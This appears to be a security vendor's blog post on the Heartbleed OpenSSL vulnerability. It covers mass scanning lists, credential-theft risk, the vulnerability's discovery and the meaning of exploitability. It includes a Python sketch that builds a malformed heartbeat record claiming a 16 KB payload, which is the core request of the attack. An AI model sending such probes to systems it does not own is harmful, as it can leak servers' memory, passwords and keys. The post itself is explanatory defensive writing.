One of the many services we provide our clients is brand intelligence. This service is usually used by banks and credit unions that want to keep an eye on their brand presence online, as well as any “chatter” about pending or ongoing attacks against their infrastructure.
Through the course of our monitoring, we have noticed some interesting activity related to the new SSL “Heartbleed” (link: http://heartbleed.com/) vulnerability. Hackers are posting huge lists of 10,000+ domains that have been run through the automated web-based Heartbleed vulnerability checking tools. These lists describe whether the web sites are vulnerable, patched, or not running SSL at all. This is not a huge surprise, given how massively prevalent the Heartbleed bug is and how quickly automated tools were created to check for the vulnerability remotely. Chances are that if you run an SSL-protected system, it has been or will be assessed by one of these tools. These scans might lead to automated attacks that harvest login credentials en masse. Since we still live in a world filled with single-factor authentication and an over-reliance on out-of-wallet questions, we can expect an increase in account takeover attacks: attackers can simply pull credentials from the memory of vulnerable servers and automatically test them against other sites.
One disclaimer: if you plan to run these tools against infrastructure that you don’t own, you are probably breaking a few laws in the process. These tools do not just check OpenSSL version numbers; they actually execute a limited attack that retrieves a small block of memory from the running server.
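That “limited attack” is worth making concrete, because the entire bug is a length-field lie. A heartbeat request carries a payload and a claimed payload length; vulnerable OpenSSL echoed back the claimed number of bytes without checking it against what actually arrived. Below is a minimal sketch of the on-the-wire layout (field values per RFC 6520; this builds the bytes only and does not contact any server):

```python
import struct

def build_heartbeat_record(claimed_len: int, payload: bytes = b"") -> bytes:
    """Build a TLS heartbeat request record (RFC 6520).

    A benign client sets claimed_len == len(payload). The Heartbleed bug
    (CVE-2014-0160): vulnerable OpenSSL trusted claimed_len and copied
    that many bytes back, leaking adjacent process memory per request.
    """
    # HeartbeatMessage: type (1 = heartbeat_request), payload_length, payload
    message = struct.pack(">BH", 1, claimed_len) + payload
    # TLS record header: content type 24 (heartbeat), version (TLS 1.1), length
    record = struct.pack(">BHH", 0x18, 0x0302, len(message)) + message
    return record

# A benign request: the claimed length matches the payload.
benign = build_heartbeat_record(4, b"ping")

# A Heartbleed-style probe: claims a 16 KB payload but sends none,
# so a vulnerable server would respond with 16 KB of its own memory.
probe = build_heartbeat_record(0x4000)
```

This is why the checkers are an attack rather than a banner grab: the only way to confirm the flaw is to send a record like `probe` and see whether memory comes back.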
This vulnerability was discovered by Neel Mehta, now with Google. I had the great pleasure of working closely with Neel for many years at Internet Security Systems (ISS). Neel is one of the most gifted vulnerability researchers in the world and is responsible for a number of major discoveries such as this one. There is a lot of talk, mostly amongst other highly gifted vulnerability researchers, about how “exploitable” this vulnerability is in the real world. The current debate centers on one question: is it possible to trick a vulnerable server into leaking enough memory to reconstruct the private key? If not, it’s still really bad: servers can expose usernames, passwords, and the contents of encrypted communications. If so, it’s even worse, because it would allow decryption of any captured SSL traffic even after the bug was fixed.
The nature of “exploitability” was something we spent a lot of time on at ISS X-Force. From a practical perspective, a vulnerability is not a vulnerability if it is not reachable, and if it’s not reachable, it’s not exploitable. In today’s environment, filled with automated tools that scrub out the boneheaded stuff, most common software, and certainly software as ubiquitous as OpenSSL, contains vulnerabilities that are vanishingly difficult to identify, much less reliably exploit in a real-world environment (reliability being a function of the probability of success and the likelihood of crashing the target application or system).
We used to agonize over how to correctly publicize the vulnerabilities we disclosed on the ISS X-Force team. In almost all cases, we would not publicize a vulnerability unless we could write a reliable exploit for it to demonstrate the true risk. That might have been the old way of doing things. Another ex-ISSer, Mark Dowd, bent space-time to his will by proving in 2008 that null pointer dereference bugs were actually reliably exploitable in the real world. That single stroke took a ton of bugs off the shelf and made them very dangerous and very exploitable. Don’t be penny wise and pound foolish: patch your systems and replace your certs. Vulnerabilities are provable in the moment, but exploitability generally increases over time.